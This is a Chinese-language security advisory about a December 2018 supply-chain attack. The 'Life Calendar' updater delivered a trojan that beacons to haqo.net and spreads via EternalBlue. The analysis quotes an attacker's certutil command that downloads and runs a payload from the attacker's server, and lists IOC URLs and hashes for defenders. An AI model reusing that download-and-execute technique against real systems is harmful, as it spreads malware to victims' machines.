利用「驅動人生」升級程序的惡意程序預警
原文作者:360核心安全團隊
0x00 概述
2018年12月14日下午,360互聯網安全中心監控到一批通過 「人生日曆」升級程序下發的下載器木馬,其具備遠程執行代碼功能,啟動後會將用戶計算機的詳細信息發往木馬伺服器,並接收遠程指令執行下一步操作。
同時該木馬還攜帶有永恆之藍漏洞攻擊組件,可通過永恆之藍漏洞攻擊區域網與互聯網中其它機器。
360安全衛士已在第一時間對該木馬進行了攔截查殺,並提交廠商處理。
360CERT在此發出預警,請用戶及時做好安全防護與病毒查殺工作。
0x01 技術細節分析
2018年12月14日14時,驅動人生旗下的「人生日曆」產品,通過其升級組件DTLUpg.exe,開始下發執行木馬程序
f79cb9d2893b254cc75dfb7f3e454a69.exe,18時開始木馬推送量開始擴大,到23時我們向廠商通報了發現的情況,下發停止。
截止12月14日21時,該木馬累計攻擊計算機超過5.7萬台(不包括漏洞攻擊情況,360安全衛士帶有永恆之藍漏洞免疫功能)。
該木馬程序執行後,會向系統安裝木馬服務Ddriver實現長期駐留,之後向伺服器haqo.net發送宿主機器的詳細信息,包括如下信息:
計算機名稱
操作系統版本
機器軟硬體信息等
之後接收伺服器返回的shellcode指令執行。
同時該木馬具有自升級,遠程下載文件執行,遠程創建服務等功能。
木馬在啟動後,會根據伺服器指令,下載一款永恆之藍漏洞利用工具,通過該漏洞利用工具,攻擊區域網與互聯網中其它計算機,攻擊成功後,使用certutil做跳板程序,向其它機器安裝該木馬(也可以安裝其它木馬,由雲端伺服器決定)。
certutil -urlcache -split -f hxxp://dl.haqo.net/dl.exe c:install.exe&c:install.exe&……
目前該木馬的C&C仍然活躍,收到的更多指令在繼續分析中。
上述由360核心安全團隊提供分析。
0x02 修復方式與安全建議
及時使用360安全衛士進行病毒查殺(360安全衛士具備的永恆之藍漏洞免疫功能,可保護用戶免遭該木馬攻擊)
1、做好相關重要數據備份工作
2、加強系統安全工作,及時升級軟體與安裝操作系統補丁
3、伺服器暫時關閉不必要的埠(如135、139、445)
4、伺服器使用高強度密碼,切勿使用弱口令,防止黑客暴力破解
0x03 相關IOC
hxxp://p.abbny.com/im.png
hxxp://i.haqo.net/i.png
hxxp://dl.haqo.net/eb.exez
hxxp://dl.haqo.net/dl.exe
ackng.com
74e2a43b2b7c6e258b3a3fc2516c1235
2e9710a4b9cba3cd11e977af87570e3b
f79cb9d2893b254cc75dfb7f3e454a69
93a0b974bac0882780f4f1de41a65cfd
0x04 時間線
2018-12-14 360互聯網安全中心監測發現木馬
2018-12-15 360CERT && 360核心安全團隊發布預警
※AI行業1000+投研領袖中心即將誕生 3天後揭曉
※華為如何繪製自動駕駛版圖?
TAG:雷鋒網 |